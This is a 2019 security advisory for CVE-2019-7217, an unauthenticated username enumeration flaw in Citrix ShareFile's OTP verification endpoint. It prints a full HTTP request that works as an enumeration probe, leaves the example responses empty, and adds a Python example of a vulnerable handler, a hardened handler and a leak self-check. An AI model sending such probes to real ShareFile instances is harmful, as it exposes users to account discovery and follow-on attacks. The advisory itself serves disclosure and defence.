Thursday, May 02, 2019

CVE-2019-7217: CITRIX SHAREFILE USER ENUMERATION

Author: Armando Huesca Prida


Summary:

It is possible to enumerate application usernames from the differing server responses to the request that checks the OTP code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

The unauthenticated OTP verification request (op=webflow-verify) returns a different response depending on whether the submitted username exists, so an attacker can enumerate valid application usernames without any credentials.

An example of the HTTP request follows:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:


Response if username is correct:


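The flaw class and its fix, as an added Python example that is not ShareFile code (the user store, usernames and OTP codes are constructed for the demonstration): the first handler answers differently for an unknown user than for a wrong code, the second returns one uniform failure and does the same amount of work on both paths, and leaks_username_existence() is a self-check a defender can run against a handler to confirm it cannot be used as a username oracle.

```python
import hmac

# Constructed sample user store: username -> currently valid OTP code.
# Made-up values for the demonstration, not ShareFile data.
USERS = {"alice@example.com": "482913"}


def vulnerable_verify(username: str, code: str) -> dict:
    """Pattern the advisory describes: the reply reveals whether the
    username exists before the OTP code is even compared."""
    if username not in USERS:
        return {"status": 404, "error": "unknown user"}
    if not hmac.compare_digest(USERS[username], code):
        return {"status": 401, "error": "invalid code"}
    return {"status": 200, "error": None}


def hardened_verify(username: str, code: str) -> dict:
    """Same check with a uniform failure path: an unknown user and a
    wrong code produce an identical response, and the comparison still
    runs against a dummy value so both branches do similar work."""
    expected = USERS.get(username, "000000")  # dummy value for unknown users
    ok = username in USERS and hmac.compare_digest(expected, code)
    if not ok:
        return {"status": 401, "error": "invalid username or code"}
    return {"status": 200, "error": None}


def leaks_username_existence(verify) -> bool:
    """Deployment self-check: submit a wrong code for a known and for an
    unknown username. If the two failure responses differ, the endpoint
    discloses which usernames exist."""
    known = verify("alice@example.com", "123")
    unknown = verify("nobody@example.com", "123")
    return known != unknown
```

Response bodies are only one channel; a complete check should also compare status codes, headers and response timing, and rate limiting on the endpoint remains a worthwhile second layer.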
Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release


Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security